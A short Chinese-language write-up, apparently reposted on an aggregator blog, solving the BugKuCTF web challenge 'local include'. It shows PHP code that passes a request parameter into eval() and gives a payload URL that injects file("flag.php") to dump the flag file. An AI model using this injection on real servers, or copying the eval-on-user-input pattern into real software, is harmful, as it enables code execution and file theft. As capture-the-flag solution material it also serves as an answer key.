http://123.206.87.240:8003/

題解：

<?php include "flag.php"; $a = @$_REQUEST['hello']; eval( "var_dump($a);"); show_source(__FILE__); ?>

原理：

$_REQUEST[]支持det、post兩種方式發送過來的請求?

var_dump()函數 顯示關于一個或多個表達式的結構信息，包括表達式的類型與值；數組將遞歸展開值，通過縮進顯示其結構

eval()函數把字符串按照 PHP 代碼來計算。該字符串必須是合法的 PHP 代碼，且必須以分號結尾。
show_source() 函數對文件進行語法高亮顯示,是 highlight_file() 的別名?

URL

http://123.206.87.240:8003/?hello=file("flag.php")

?

總結

以上是生活随笔為你收集整理的BugKuCTF WEB 本地包含的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。